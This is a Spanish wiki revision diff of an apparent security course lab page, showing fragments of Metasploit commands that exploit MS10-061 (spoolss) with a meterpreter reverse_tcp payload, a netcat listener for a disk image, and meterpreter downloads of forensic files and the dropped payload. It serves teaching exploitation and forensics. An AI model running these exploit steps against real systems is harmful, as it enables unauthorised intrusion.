Herramientas de usuario

Herramientas del sitio


sad:t2:m4

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anteriorRevisión previa
Próxima revisión
Revisión previa
sad:t2:m4 [2018/12/17 14:23] José Manuel Guallarsad:t2:m4 [2019/01/10 14:40] (actual) José Manuel Guallar
Línea 120: Línea 120:
 msfconsole msfconsole
 search ms10_061 search ms10_061
-use exploit/windows/smb/sm10_061_spoolss+use exploit/windows/smb/ms10_061_spoolss
 info info
 set PAYLOAD windows/meterpreter/reverse_tcp set PAYLOAD windows/meterpreter/reverse_tcp
Línea 193: Línea 193:
  
 <code> <code>
-tasklist > forensics_tasklist.txt +tasklist > forense_tasklist.txt 
-netstat -nao > forensics_netstat.txt +netstat -nao > forense_netstat.txt 
-dir > forensics_dir.txt+dir > forense_dir.txt
 exit exit
 </code> </code>
Línea 237: Línea 237:
 </code> </code>
  
-Se crea un directorio  llamado forense /ms10_061. Use (-p) para suprimir un error si el directorio ya existe.+Se crea un directorio  llamado forense/ms10_061. Use (-p) para suprimir un error si el directorio ya existe.
  
-Se cambia el directorio en/forense ICS/ms10_061.+Se cambia el directorio en/forense /ms10_061.
  
 Creamos un escucha netcat (-l) en el puerto (-p) 8888 en modo detallado extremo (-vvv) redirigir (>) salida en un archivo (ms10_016.dd) Creamos un escucha netcat (-l) en el puerto (-p) 8888 en modo detallado extremo (-vvv) redirigir (>) salida en un archivo (ms10_016.dd)
Línea 285: Línea 285:
 <code> <code>
 pwd pwd
-download C:\\WINDOWS\\system32\\forensics_tasklist.txt /forensics/ms10_061/ +download C:\\WINDOWS\\system32\\forense_tasklist.txt /forense/ms10_061/ 
-download C:\\WINDOWS\\system32\\forensics_netstat.txt /forensics/ms10_061/ +download C:\\WINDOWS\\system32\\forense_netstat.txt /forense/ms10_061/ 
-download C:\\WINDOWS\\system32\\forensics_dir.txt /forensics/ms10_061/ +download C:\\WINDOWS\\system32\\forense_dir.txt /forense/ms10_061/ 
-download C:\\WINDOWS\\system32\\RvOYs3UqrJqo7a.exe /forensics/ms10_061/+download C:\\WINDOWS\\system32\\RvOYs3UqrJqo7a.exe /forense/ms10_061/
 </code> </code>
  
sad/t2/m4.1545056635.txt.gz · Última modificación: (editor externo)